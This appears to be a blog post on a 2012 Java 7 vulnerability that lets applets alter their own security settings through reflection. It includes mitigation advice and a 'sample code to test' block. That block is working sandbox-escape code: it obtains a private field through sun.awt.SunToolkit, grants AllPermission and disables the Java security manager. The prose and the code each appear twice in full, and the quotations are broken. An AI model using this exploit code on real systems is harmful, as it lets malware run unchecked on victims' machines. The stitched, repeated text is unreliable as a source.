Posts
The exploited vulnerability exists in all
versions of Java 7, and can be used to exploit not just Windows, but
also Apple OS X and Linux systems. "I have tested the following
operating systems: Windows7, Ubuntu 12.04, OSX 10.8.1 [and] I have
tested the following browsers: Firefox 14.0.1 (Windows, Linux, OSX), IE
9, Safari 6.
This exploit is awesome," he said. "[It's] not a buffer overflow or anything like that, it uses a flaw in the JRE design that allows a Java app to change its own security settings with reflection." As a result, an attacker can use the vulnerability to arbitrarily change Java security settings, allowing malware to read, write, and execute code on an infected system.
Oracle has yet to detail when it will release a related Java patch for the vulnerability. "The next scheduled update for Java is October 16th, 2012. Oracle has a bad track record for releasing timely patches for Java exploits, but with all the attention this flaw is getting I would hope it would release an out of cycle fix if for no other reason than to save face.
Until Oracle does patch the vulnerability, "the best way to prevent this attack at the moment is by removing or disabling [the] Java plug-in from your browser settings. "Once Oracle comes up with a patch you can re-enable this plug-in." Don't, however, roll back to a previous version of Java, since older versions have numerous known vulnerabilities.
SAMPLE CODE TO TEST
Class sun_awt_SunToolkit = ClassFinder.findClass("sun.awt.SunToolkit");
Expression expr = new Expression(sun_awt_SunToolkit, "getField", new Object[] { Statement.class, "acc" });
expr.execute();
Field acc_Field = ((Field) expr.getValue());
// create an access control context with all permissions
Permissions allPerms = new Permissions();
allPerms.add(new AllPermission());
AccessControlContext allPermAcc = new AccessControlContext(new ProtectionDomain[] {
new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), allPerms)
});
Statement disableSecurityManager = new Statement(java.lang.System.class, "setSecurityManager", new Object[1]);
acc_Field.set(disableSecurityManager, allPermAcc);
// and call it (now that it has all permissions)
disableSecurityManager.execute();
.....
.......
This exploit is awesome," he said. "[It's] not a buffer overflow or anything like that, it uses a flaw in the JRE design that allows a Java app to change its own security settings with reflection." As a result, an attacker can use the vulnerability to arbitrarily change Java security settings, allowing malware to read, write, and execute code on an infected system.
Oracle has yet to detail when it will release a related Java patch for the vulnerability. "The next scheduled update for Java is October 16th, 2012. Oracle has a bad track record for releasing timely patches for Java exploits, but with all the attention this flaw is getting I would hope it would release an out of cycle fix if for no other reason than to save face.
Until Oracle does patch the vulnerability, "the best way to prevent this attack at the moment is by removing or disabling [the] Java plug-in from your browser settings. "Once Oracle comes up with a patch you can re-enable this plug-in." Don't, however, roll back to a previous version of Java, since older versions have numerous known vulnerabilities.
SAMPLE CODE TO TEST
Class sun_awt_SunToolkit = ClassFinder.findClass("sun.awt.SunToolkit");
Expression expr = new Expression(sun_awt_SunToolkit, "getField", new Object[] { Statement.class, "acc" });
expr.execute();
Field acc_Field = ((Field) expr.getValue());
// create an access control context with all permissions
Permissions allPerms = new Permissions();
allPerms.add(new AllPermission());
AccessControlContext allPermAcc = new AccessControlContext(new ProtectionDomain[] {
new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), allPerms)
});
Statement disableSecurityManager = new Statement(java.lang.System.class, "setSecurityManager", new Object[1]);
acc_Field.set(disableSecurityManager, allPermAcc);
// and call it (now that it has all permissions)
disableSecurityManager.execute();
.....
.......
